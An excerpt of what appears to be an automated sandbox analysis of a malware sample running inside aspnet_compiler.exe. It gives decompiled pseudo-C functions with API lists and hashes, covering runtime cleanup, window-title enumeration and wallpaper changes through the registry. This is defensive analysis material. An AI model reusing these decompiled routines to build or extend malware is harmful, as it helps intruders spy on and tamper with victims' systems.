                				void* __esi;
                				intOrPtr _t2;
                				void* _t4;
                				void* _t10;
                				void* _t11;
                				void* _t13;
                				void* _t15;
                				long _t16;
                
                				_t11 = __ecx;
                				_t16 = GetLastError();
                				_t10 = 0;
                				_t2 =  *0x46f1dc; // 0x6
                				_t19 = _t2 - 0xffffffff;
                				if(_t2 == 0xffffffff) {
                					L2:
                					_t15 = E004443F4(_t11, 1, 0x364);
                					_pop(_t13);
                					if(_t15 != 0) {
                						_t4 = E00447092(_t13, _t16, __eflags,  *0x46f1dc, _t15);
                						__eflags = _t4;
                						if(_t4 != 0) {
                							E00446907(_t13, _t15, 0x470664);
                							E00445002(_t10);
                							__eflags = _t15;
                							if(_t15 != 0) {
                								goto L9;
                							} else {
                								goto L8;
                							}
                						} else {
                							_push(_t15);
                							goto L4;
                						}
                					} else {
                						_push(_t10);
                						L4:
                						E00445002();
                						L8:
                						SetLastError(_t16);
                					}
                				} else {
                					_t15 = E0044703C(_t11, _t16, _t19, _t2);
                					if(_t15 != 0) {
                						L9:
                						SetLastError(_t16);
                						_t10 = _t15;
                					} else {
                						goto L2;
                					}
                				}
                				return _t10;
                			}

                APIs
                • GetLastError.KERNEL32(?,00000000,00000000,0043A556,00000000,00000000,?,0043A5DA,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00446B1E
                • _free.LIBCMT ref: 00446B53
                • _free.LIBCMT ref: 00446B7A
                • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00446B87
                • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00446B90
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$_free
                • String ID:
                • API String ID: 3170660625-0
                • Opcode ID: 2af989fa884a69d0fa37520c75958db6afc4f652e0641eba9099b80d7b86f832
                • Instruction ID: 0346a1b294bc514b0a994de80f7e6f12b46350d74b5091e52828a709d6f7ce0e
                • Opcode Fuzzy Hash: 2af989fa884a69d0fa37520c75958db6afc4f652e0641eba9099b80d7b86f832
                • Instruction Fuzzy Hash: B6012676205B506BB7112629BC45D6F2269CBD37B9722003BF409D32C2EE7CDC06416F
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0044F23C(intOrPtr* _a4) {
                				intOrPtr _t6;
                				intOrPtr* _t21;
                				void* _t23;
                				void* _t24;
                				void* _t25;
                				void* _t26;
                				void* _t27;
                
                				_t21 = _a4;
                				if(_t21 != 0) {
                					_t23 =  *_t21 -  *0x46f188; // 0x46f180
                					if(_t23 != 0) {
                						E00445002(_t7);
                					}
                					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x46f18c; // 0x47065c
                					if(_t24 != 0) {
                						E00445002(_t8);
                					}
                					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x46f190; // 0x47065c
                					if(_t25 != 0) {
                						E00445002(_t9);
                					}
                					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x46f1b8; // 0x46f184
                					if(_t26 != 0) {
                						E00445002(_t10);
                					}
                					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                					_t27 = _t6 -  *0x46f1bc; // 0x470660
                					if(_t27 != 0) {
                						return E00445002(_t6);
                					}
                				}
                				return _t6;
                			}

                APIs
                • _free.LIBCMT ref: 0044F254
                  • Part of subcall function 00445002: HeapFree.KERNEL32(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                  • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                • _free.LIBCMT ref: 0044F266
                • _free.LIBCMT ref: 0044F278
                • _free.LIBCMT ref: 0044F28A
                • _free.LIBCMT ref: 0044F29C
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 516e47d2e0f60d5fede89190a792db0aa6a45a74a38a5f68d9a0fd3effe540a6
                • Instruction ID: f954284d0b45cb36624272f64f50ef8c725a3c78d63bb55929d804f861096251
                • Opcode Fuzzy Hash: 516e47d2e0f60d5fede89190a792db0aa6a45a74a38a5f68d9a0fd3effe540a6
                • Instruction Fuzzy Hash: A3F09676504601EBEA30EB69F983C4B73D9BA05B54354487BF048D7641C7B9FC844AAC
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 91%
                			E00442968(signed int __ecx) {
                				intOrPtr _t7;
                
                				asm("lock xadd [eax], ecx");
                				if((__ecx | 0xffffffff) == 0) {
                					_t7 =  *0x46f9a0; // 0x140a318
                					if(_t7 != 0x46f780) {
                						E00445002(_t7);
                						 *0x46f9a0 = 0x46f780;
                					}
                				}
                				E00445002( *0x470a18);
                				 *0x470a18 = 0;
                				E00445002( *0x470a1c);
                				 *0x470a1c = 0;
                				E00445002( *0x470a48);
                				 *0x470a48 = 0;
                				E00445002( *0x470a4c);
                				 *0x470a4c = 0;
                				return 1;
                			}

                APIs
                • _free.LIBCMT ref: 00442986
                  • Part of subcall function 00445002: HeapFree.KERNEL32(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                  • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                • _free.LIBCMT ref: 00442998
                • _free.LIBCMT ref: 004429AB
                • _free.LIBCMT ref: 004429BC
                • _free.LIBCMT ref: 004429CD
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 93600525103f6331525761e29ceec305afa513f2dd5993403a2e8bdf270ab536
                • Instruction ID: ac8127230bc54366d86f294ef586a91d245084804c15bedb181f71e342f475e2
                • Opcode Fuzzy Hash: 93600525103f6331525761e29ceec305afa513f2dd5993403a2e8bdf270ab536
                • Instruction Fuzzy Hash: 30F0D0B9902721DBDB51AF19FC428093760A724B24781913BF45C56B71D77909858FCE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E0044CF69(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
                				intOrPtr _v0;
                				char _v6;
                				char _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v24;
                				signed int _v28;
                				signed int _v36;
                				intOrPtr* _v64;
                				intOrPtr _v96;
                				intOrPtr* _v100;
                				CHAR* _v104;
                				signed int _v116;
                				char _v290;
                				signed int _v291;
                				struct _WIN32_FIND_DATAA _v336;
                				union _FINDEX_INFO_LEVELS _v340;
                				signed int _v344;
                				signed int _v348;
                				intOrPtr _v440;
                				intOrPtr* _t80;
                				signed int _t82;
                				signed int _t87;
                				signed int _t91;
                				signed int _t93;
                				signed int _t95;
                				signed int _t96;
                				signed int _t100;
                				signed int _t103;
                				signed int _t108;
                				signed int _t111;
                				intOrPtr _t113;
                				signed char _t115;
                				union _FINDEX_INFO_LEVELS _t123;
                				signed int _t128;
                				signed int _t131;
                				void* _t137;
                				void* _t139;
                				signed int _t140;
                				signed int _t143;
                				signed int _t145;
                				signed int _t147;
                				signed int* _t148;
                				signed int _t151;
                				void* _t154;
                				CHAR* _t155;
                				char _t158;
                				char _t160;
                				intOrPtr* _t163;
                				void* _t164;
                				intOrPtr* _t165;
                				signed int _t167;
                				void* _t169;
                				intOrPtr* _t170;
                				signed int _t174;
                				signed int _t178;
                				signed int _t179;
                				intOrPtr* _t184;
                				void* _t193;
                				intOrPtr _t194;
                				signed int _t196;
                				signed int _t197;
                				signed int _t199;
                				signed int _t200;
                				signed int _t202;
                				union _FINDEX_INFO_LEVELS _t203;
                				signed int _t208;
                				signed int _t210;
                				signed int _t211;
                				void* _t213;
                				intOrPtr _t214;
                				void* _t215;
                				signed int _t219;
                				void* _t221;
                				signed int _t222;
                				void* _t223;
                				void* _t224;
                				void* _t225;
                				signed int _t226;
                				void* _t227;
                				void* _t228;
                
                				_t80 = _a8;
                				_t224 = _t223 - 0x20;
                				if(_t80 != 0) {
                					_t208 = _a4;
                					_t160 = 0;
                					 *_t80 = 0;
                					_t199 = 0;
                					_t151 = 0;
                					_v36 = 0;
                					_v336.cAlternateFileName = 0;
                					_v28 = 0;
                					__eflags =  *_t208;
                					if( *_t208 == 0) {
                						L9:
                						_v12 = _v12 & 0x00000000;
                						_t82 = _t151 - _t199;
                						_v8 = _t160;
                						_t191 = (_t82 >> 2) + 1;
                						__eflags = _t151 - _t199;
                						_v16 = (_t82 >> 2) + 1;
                						asm("sbb esi, esi");
                						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
                						__eflags = _t210;
                						if(_t210 != 0) {
                							_t197 = _t199;
                							_t158 = _t160;
                							do {
                								_t184 =  *_t197;
                								_t17 = _t184 + 1; // 0x1
                								_v8 = _t17;
                								do {
                									_t143 =  *_t184;
                									_t184 = _t184 + 1;
                									__eflags = _t143;
                								} while (_t143 != 0);
                								_t158 = _t158 + 1 + _t184 - _v8;
                								_t197 = _t197 + 4;
                								_t145 = _v12 + 1;
                								_v12 = _t145;
                								__eflags = _t145 - _t210;
                							} while (_t145 != _t210);
                							_t191 = _v16;
                							_v8 = _t158;
                							_t151 = _v336.cAlternateFileName;
                						}
                						_t211 = E00441F9E(_t191, _v8, 1);
                						_t225 = _t224 + 0xc;
                						__eflags = _t211;
                						if(_t211 != 0) {
                							_t87 = _t211 + _v16 * 4;
                							_v20 = _t87;
                							_t192 = _t87;
                							_v16 = _t87;
                							__eflags = _t199 - _t151;
                							if(_t199 == _t151) {
                								L23:
                								_t200 = 0;
                								__eflags = 0;
                								 *_a8 = _t211;
                								goto L24;
                							} else {
                								_t93 = _t211 - _t199;
                								__eflags = _t93;
                								_v24 = _t93;
                								do {
                									_t163 =  *_t199;
                									_v12 = _t163 + 1;
                									do {
                										_t95 =  *_t163;
                										_t163 = _t163 + 1;
                										__eflags = _t95;
                									} while (_t95 != 0);
                									_t164 = _t163 - _v12;
                									_t35 = _t164 + 1; // 0x1
                									_t96 = _t35;
                									_push(_t96);
                									_v12 = _t96;
                									_t100 = E00440303(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
                									_t225 = _t225 + 0x10;
                									__eflags = _t100;
                									if(_t100 != 0) {
                										_push(0);
                										_push(0);
                										_push(0);
                										_push(0);
                										_push(0);
                										E0043A5E8();
                										asm("int3");
                										_t221 = _t225;
                										_push(_t164);
                										_t165 = _v64;
                										_t47 = _t165 + 1; // 0x1
                										_t193 = _t47;
                										do {
                											_t103 =  *_t165;
                											_t165 = _t165 + 1;
                											__eflags = _t103;
                										} while (_t103 != 0);
                										_push(_t199);
                										_t202 = _a8;
                										_t167 = _t165 - _t193 + 1;
                										_v12 = _t167;
                										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
                										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
                											_push(_t151);
                											_t50 = _t202 + 1; // 0x1
                											_t154 = _t50 + _t167;
                											_t213 = E004443F4(_t167, _t154, 1);
                											_t169 = _t211;
                											__eflags = _t202;
                											if(_t202 == 0) {
                												L34:
                												_push(_v12);
                												_t154 = _t154 - _t202;
                												_t108 = E00440303(_t169, _t213 + _t202, _t154, _v0);
                												_t226 = _t225 + 0x10;
                												__eflags = _t108;
                												if(__eflags != 0) {
                													goto L37;
                												} else {
                													_t137 = E0044D338(_a12, __eflags, _t213);
                													E00445002(0);
                													_t139 = _t137;
                													goto L36;
                												}
                											} else {
                												_push(_t202);
                												_t140 = E00440303(_t169, _t213, _t154, _a4);
                												_t226 = _t225 + 0x10;
                												__eflags = _t140;
                												if(_t140 != 0) {
                													L37:
                													_push(0);
                													_push(0);
                													_push(0);
                													_push(0);
                													_push(0);
                													E0043A5E8();
                													asm("int3");
                													_push(_t221);
                													_t222 = _t226;
                													_t227 = _t226 - 0x150;
                													_t111 =  *0x46f00c; // 0xd60a1515
                													_v116 = _t111 ^ _t222;
                													_t170 = _v100;
                													_push(_t154);
                													_t155 = _v104;
                													_push(_t213);
                													_t214 = _v96;
                													_push(_t202);
                													_v440 = _t214;
                													while(1) {
                														__eflags = _t170 - _t155;
                														if(_t170 == _t155) {
                															break;
                														}
                														_t113 =  *_t170;
                														__eflags = _t113 - 0x2f;
                														if(_t113 != 0x2f) {
                															__eflags = _t113 - 0x5c;
                															if(_t113 != 0x5c) {
                																__eflags = _t113 - 0x3a;
                																if(_t113 != 0x3a) {
                																	_t170 = E00454B80(_t155, _t170);
                																	continue;
                																}
                															}
                														}
                														break;
                													}
                													_t194 =  *_t170;
                													__eflags = _t194 - 0x3a;
                													if(_t194 != 0x3a) {
                														L47:
                														_t203 = 0;
                														__eflags = _t194 - 0x2f;
                														if(_t194 == 0x2f) {
                															L51:
                															_t115 = 1;
                															__eflags = 1;
                														} else {
                															__eflags = _t194 - 0x5c;
                															if(_t194 == 0x5c) {
                																goto L51;
                															} else {
                																__eflags = _t194 - 0x3a;
                																if(_t194 == 0x3a) {
                																	goto L51;
                																} else {
                																	_t115 = 0;
                																}
                															}
                														}
                														asm("sbb eax, eax");
                														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
                														E00435760(_t203,  &_v336, _t203, 0x140);
                														_t228 = _t227 + 0xc;
                														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
                														_t123 = _v340;
                														__eflags = _t215 - 0xffffffff;
                														if(_t215 != 0xffffffff) {
                															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                															__eflags = _t174;
                															_v348 = _t174 >> 2;
                															do {
                																__eflags = _v336.cFileName - 0x2e;
                																if(_v336.cFileName != 0x2e) {
                																	L64:
                																	_push(_t123);
                																	_push(_v344);
                																	_t123 =  &(_v336.cFileName);
                																	_push(_t155);
                																	_push(_t123);
                																	L28();
                																	_t228 = _t228 + 0x10;
                																	__eflags = _t123;
                																	if(_t123 != 0) {
                																		goto L54;
                																	} else {
                																		goto L65;
                																	}
                																} else {
                																	_t178 = _v291;
                																	__eflags = _t178;
                																	if(_t178 == 0) {
                																		goto L65;
                																	} else {
                																		__eflags = _t178 - 0x2e;
                																		if(_t178 != 0x2e) {
                																			goto L64;
                																		} else {
                																			__eflags = _v290;
                																			if(_v290 == 0) {
                																				goto L65;
                																			} else {
                																				goto L64;
                																			}
                																		}
                																	}
                																}
                																goto L58;
                																L65:
                																_t128 = FindNextFileA(_t215,  &_v336);
                																__eflags = _t128;
                																_t123 = _v340;
                															} while (_t128 != 0);
                															_t195 =  *_t123;
                															_t179 = _v348;
                															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                															__eflags = _t179 - _t131;
                															if(_t179 != _t131) {
                																E0043F8D0(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E0044CF51);
                															}
                														} else {
                															_push(_t123);
                															_push(_t203);
                															_push(_t203);
                															_push(_t155);
                															L28();
                															L54:
                															_t203 = _t123;
                														}
                														__eflags = _t215 - 0xffffffff;
                														if(_t215 != 0xffffffff) {
                															FindClose(_t215);
                														}
                													} else {
                														__eflags = _t170 -  &(_t155[1]);
                														if(_t170 ==  &(_t155[1])) {
                															goto L47;
                														} else {
                															_push(_t214);
                															_push(0);
                															_push(0);
                															_push(_t155);
                															L28();
                														}
                													}
                													L58:
                													__eflags = _v16 ^ _t222;
                													return E004338BB(_v16 ^ _t222);
                												} else {
                													goto L34;
                												}
                											}
                										} else {
                											_t139 = 0xc;
                											L36:
                											return _t139;
                										}
                									} else {
                										goto L22;
                									}
                									goto L68;
                									L22:
                									_t196 = _v16;
                									 *((intOrPtr*)(_v24 + _t199)) = _t196;
                									_t199 = _t199 + 4;
                									_t192 = _t196 + _v12;
                									_v16 = _t196 + _v12;
                									__eflags = _t199 - _t151;
                								} while (_t199 != _t151);
                								goto L23;
                							}
                						} else {
                							_t200 = _t199 | 0xffffffff;
                							L24:
                							E00445002(0);
                							goto L25;
                						}
                					} else {
                						while(1) {
                							_v8 = 0x3f2a;
                							_v6 = _t160;
                							_t147 = E00454B40( *_t208,  &_v8);
                							__eflags = _t147;
                							if(_t147 != 0) {
                								_push( &_v36);
                								_push(_t147);
                								_push( *_t208);
                								L38();
                								_t224 = _t224 + 0xc;
                							} else {
                								_t147 =  &_v36;
                								_push(_t147);
                								_push(0);
                								_push(0);
                								_push( *_t208);
                								L28();
                								_t224 = _t224 + 0x10;
                							}
                							_t200 = _t147;
                							__eflags = _t200;
                							if(_t200 != 0) {
                								break;
                							}
                							_t208 = _t208 + 4;
                							_t160 = 0;
                							__eflags =  *_t208;
                							if( *_t208 != 0) {
                								continue;
                							} else {
                								_t151 = _v336.cAlternateFileName;
                								_t199 = _v36;
                								goto L9;
                							}
                							goto L68;
                						}
                						L25:
                						E0044D313( &_v36);
                						_t91 = _t200;
                						goto L26;
                					}
                				} else {
                					_t148 = E0043EEAD();
                					_t219 = 0x16;
                					 *_t148 = _t219;
                					E0043A5BB();
                					_t91 = _t219;
                					L26:
                					return _t91;
                				}
                				L68:
                			}

                APIs
                • _strpbrk.LIBCMT ref: 0044CFB8
                • _free.LIBCMT ref: 0044D0D5
                  • Part of subcall function 0043A5E8: IsProcessorFeaturePresent.KERNEL32(00000017,0043A5BA,004050E3,?,00000000,00000000,00402086,00000000,00000000,?,0043A5DA,00000000,00000000,00000000,00000000,00000000), ref: 0043A5EA
                  • Part of subcall function 0043A5E8: GetCurrentProcess.KERNEL32(C0000417,?,004050E3), ref: 0043A60C
                  • Part of subcall function 0043A5E8: TerminateProcess.KERNEL32(00000000,?,004050E3), ref: 0043A613
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                • String ID: *?$.
                • API String ID: 2812119850-3972193922
                • Opcode ID: 4f99e93415464d5738f8b0ec0c1dd26b56c598080a7d5787abd8bcea82267666
                • Instruction ID: 0665d5b14a1e4b9cb67c1a99571701ed5e9b0677a739cf7a3229819190da0774
                • Opcode Fuzzy Hash: 4f99e93415464d5738f8b0ec0c1dd26b56c598080a7d5787abd8bcea82267666
                • Instruction Fuzzy Hash: 88518271E00109AFEF14DFA9C881AAEF7B5EF48318F24416FE854E7341D6799E068B54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E004165EC(void* __edi, struct HWND__* _a4) {
                				short _v604;
                				char _v632;
                				void* _v636;
                				char _v656;
                				void* _v660;
                				char _v680;
                				void* _v684;
                				char _v704;
                				void* _v708;
                				char _v728;
                				void* _v732;
                				char _v752;
                				void* _v756;
                				char _v776;
                				void* _v780;
                				char _v800;
                				void* _v804;
                				char _v824;
                				void* _v828;
                				char _v848;
                				void* _v852;
                				char _v872;
                				void* _v876;
                				char _v896;
                				void* _v900;
                				char _v920;
                				void* _v924;
                				char _v940;
                				char _v944;
                				void* _v948;
                				char _v964;
                				char _v968;
                				void* _v972;
                				char _v988;
                				long _v992;
                				intOrPtr _v996;
                				void* __ebx;
                				void* __ebp;
                				int _t50;
                				void* _t54;
                				void* _t56;
                				signed int _t87;
                				struct HWND__* _t149;
                				void* _t152;
                
                				_t147 = __edi;
                				_push(_t87);
                				_t149 = _a4;
                				GetWindowThreadProcessId(_t149,  &_v992);
                				E0041A6E9(_t87,  &_v940, _t149);
                				E0041A6E9(_t87,  &_v964, _v992);
                				GetWindowTextW(_t149,  &_v604, 0x12c);
                				_t50 = IsWindowVisible(_t149);
                				_t156 = _t50;
                				_t88 = _t87 & 0xffffff00 | _t50 != 0x00000000;
                				E0040415E(_t87 & 0xffffff00 | _t50 != 0x00000000,  &_v988, _v992, _t152,  &_v604);
                				_t54 = E0041A879(_t87 & 0xffffff00 | _t50 != 0x00000000,  &_v656, E0041AB76( &_v632, _v996));
                				_t56 = E0041A879(_t88,  &_v680,  &_v992);
                				L00403356(E00408832(_t88,  &_v920, E00402E81( &_v896, E00408832(_t88,  &_v872, E00402EF0(_t88,  &_v848, E00408832(_t88,  &_v824, E00402E81( &_v800, E00408832(_t88,  &_v776, E00402EF0(_t88,  &_v752, E00408832(_t88,  &_v728, E0041A6E9(_t88,  &_v704, _t88 & 0x000000ff), __edi, _t152, _t50, 0x46a788), _t152, _t156,  &_v944), __edi, _t152, _t156, 0x46a788), _t56), __edi, _t152, _t156, 0x46a788), _t152, _t156,  &_v968), _t147, _t152, _t156, 0x46a788), _t54), _t147, _t152, _t156, 0x46a630));
                				E00401FB8();
                				E00401FB8();
                				E00401FB8();
                				E00401FB8();
                				E00401FB8();
                				E00401FB8();
                				E00401FB8();
                				E00401FB8();
                				E00401FB8();
                				E00401FB8();
                				E00401FB8();
                				E00401FB8();
                				E00401EE9();
                				E00401EE9();
                				E00401FB8();
                				E00401FB8();
                				return 1;
                			}

                APIs
                • GetWindowThreadProcessId.USER32(?,?), ref: 00416603
                • GetWindowTextW.USER32 ref: 0041662F
                • IsWindowVisible.USER32(?), ref: 00416636
                  • Part of subcall function 0041AB76: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041AB8B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Window$Process$OpenTextThreadVisible
                • String ID: h5G
                • API String ID: 478698014-4077671695
                • Opcode ID: c734f3f8915459a3965ae4185bfcd322c1eaa7ffedfc91832255b2e5e7fdfc75
                • Instruction ID: 99c6d8f7261b3cee98e9cdba014bcc0a4643868b1acb47591d6874b1b0f6d138
                • Opcode Fuzzy Hash: c734f3f8915459a3965ae4185bfcd322c1eaa7ffedfc91832255b2e5e7fdfc75
                • Instruction Fuzzy Hash: E241E4311082419BC324FB65D891DDFF3E9AFD4354F50893EF48A921E1EF349A4ACA5A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E00441D05(void* __ecx, void* __edx, intOrPtr _a4) {
                				signed int _v8;
                				void* _v12;
                				char _v16;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr* _t36;
                				struct HINSTANCE__* _t37;
                				struct HINSTANCE__* _t43;
                				intOrPtr* _t44;
                				intOrPtr* _t45;
                				CHAR* _t49;
                				struct HINSTANCE__* _t50;
                				void* _t52;
                				struct HINSTANCE__* _t55;
                				intOrPtr* _t59;
                				struct HINSTANCE__* _t64;
                				intOrPtr _t65;
                
                				_t52 = __ecx;
                				if(_a4 == 2 || _a4 == 1) {
                					E0044D8D9(_t52);
                					GetModuleFileNameA(0, 0x4703d8, 0x104);
                					_t49 =  *0x470a50; // 0x13f3458
                					 *0x470a58 = 0x4703d8;
                					if(_t49 == 0 ||  *_t49 == 0) {
                						_t49 = 0x4703d8;
                					}
                					_v8 = 0;
                					_v16 = 0;
                					E00441E29(_t52, _t49, 0, 0,  &_v8,  &_v16);
                					_t64 = E00441F9E(_v8, _v16, 1);
                					if(_t64 != 0) {
                						E00441E29(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                						if(_a4 != 1) {
                							_v12 = 0;
                							_push( &_v12);
                							_t50 = E0044D3F4(_t49, 0, _t64, _t64);
                							if(_t50 == 0) {
                								_t59 = _v12;
                								_t55 = 0;
                								_t36 = _t59;
                								if( *_t59 == 0) {
                									L15:
                									_t37 = 0;
                									 *0x470a44 = _t55;
                									_v12 = 0;
                									_t50 = 0;
                									 *0x470a48 = _t59;
                									L16:
                									E00445002(_t37);
                									_v12 = 0;
                									goto L17;
                								} else {
                									goto L14;
                								}
                								do {
                									L14:
                									_t36 = _t36 + 4;
                									_t55 =  &(_t55->i);
                								} while ( *_t36 != 0);
                								goto L15;
                							}
                							_t37 = _v12;
                							goto L16;
                						}
                						 *0x470a44 = _v8 - 1;
                						_t43 = _t64;
                						_t64 = 0;
                						 *0x470a48 = _t43;
                						goto L10;
                					} else {
                						_t44 = E0043EEAD();
                						_push(0xc);
                						_pop(0);
                						 *_t44 = 0;
                						L10:
                						_t50 = 0;
                						L17:
                						E00445002(_t64);
                						return _t50;
                					}
                				} else {
                					_t45 = E0043EEAD();
                					_t65 = 0x16;
                					 *_t45 = _t65;
                					E0043A5BB();
                					return _t65;
                				}
                			}






















                APIs
                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000104), ref: 00441D45
                • _free.LIBCMT ref: 00441E10
                • _free.LIBCMT ref: 00441E1A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$FileModuleName
                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                • API String ID: 2506810119-572611079
                • Opcode ID: fb92f241e2e05432639b7b32ac1502f6d059981408861d6403be201cf46156aa
                • Instruction ID: c557cc44e93a4f3526c8424d226de774fcc48449be6b5aaf792980d9704e92f2
                • Opcode Fuzzy Hash: fb92f241e2e05432639b7b32ac1502f6d059981408861d6403be201cf46156aa
                • Instruction Fuzzy Hash: 663173B5E01258EFEB21DB99D88199FBBBCEB44314F10406BF80897221D6749A818799
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 27%
                			E0041B35B(void* __ecx, void* __edx) {
                				void* __ebx;
                				char* _t10;
                				void* _t12;
                				void* _t14;
                				void* _t15;
                				void* _t16;
                				void* _t17;
                				void* _t18;
                				void* _t24;
                				void* _t26;
                				void* _t27;
                				void* _t28;
                				void* _t32;
                				void* _t34;
                
                				_t21 = __edx;
                				_t24 = __edx;
                				_t12 = __ecx;
                				if(_t12 == 0) {
                					_push(1);
                					_t28 = _t27 - 0x18;
                					_t10 = "0";
                					E00402073(_t10, _t28, __edx, _t26, _t10);
                					_t25 = "Control Panel\\Desktop";
                					_push("WallpaperStyle");
                					_t22 = "Control Panel\\Desktop";
                					E00412A57(_t28, "Control Panel\\Desktop");
                					_push(1);
                					_t14 = _t28 + 0x20 - 0x18;
                					_push(_t10);
                					goto L11;
                				} else {
                					_t15 = _t12 - 1;
                					if(_t15 == 0) {
                						_push(1);
                						_t32 = _t27 - 0x18;
                						_t16 = _t32;
                						_push("2");
                						goto L7;
                					} else {
                						_t17 = _t15 - 1;
                						if(_t17 == 0) {
                							_push(1);
                							_t32 = _t27 - 0x18;
                							_t16 = _t32;
                							_push("10");
                							goto L7;
                						} else {
                							_t18 = _t17 - 1;
                							if(_t18 == 0) {
                								_push(1);
                								_t32 = _t27 - 0x18;
                								_t16 = _t32;
                								_push("6");
                								L7:
                								E00402073(_t10, _t16, _t21, _t26);
                								_t25 = "Control Panel\\Desktop";
                								_push("WallpaperStyle");
                								_t22 = "Control Panel\\Desktop";
                								E00412A57(_t16, "Control Panel\\Desktop");
                								_push(1);
                								_t14 = _t32 + 0x20 - 0x18;
                								_push("0");
                								goto L11;
                							} else {
                								if(_t18 == 1) {
                									_push(1);
                									_t34 = _t27 - 0x18;
                									E00402073(_t10, _t34, __edx, _t26, "0");
                									_t25 = "Control Panel\\Desktop";
                									_push("WallpaperStyle");
                									_t22 = "Control Panel\\Desktop";
                									E00412A57(_t34, "Control Panel\\Desktop");
                									_push(1);
                									_t14 = _t34 + 0x20 - 0x18;
                									_push("1");
                									L11:
                									E00402073(_t10, _t14, _t22, _t26);
                									E00412A57(_t14, _t25);
                								}
                							}
                						}
                					}
                				}
                				return SystemParametersInfoW(0x14, 0, _t24, 3);
                			}


















                APIs
                • SystemParametersInfoW.USER32 ref: 0041B450
                  • Part of subcall function 00412A57: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00412A66
                  • Part of subcall function 00412A57: RegSetValueExA.KERNELBASE(?,00465480,00000000,?,00000000,00000000,00473238,?,?,0040ED96,00465480,4.6.0 Pro), ref: 00412A8E
                  • Part of subcall function 00412A57: RegCloseKey.KERNELBASE(?,?,?,0040ED96,00465480,4.6.0 Pro), ref: 00412A99
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateInfoParametersSystemValue
                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                • API String ID: 4127273184-3576401099
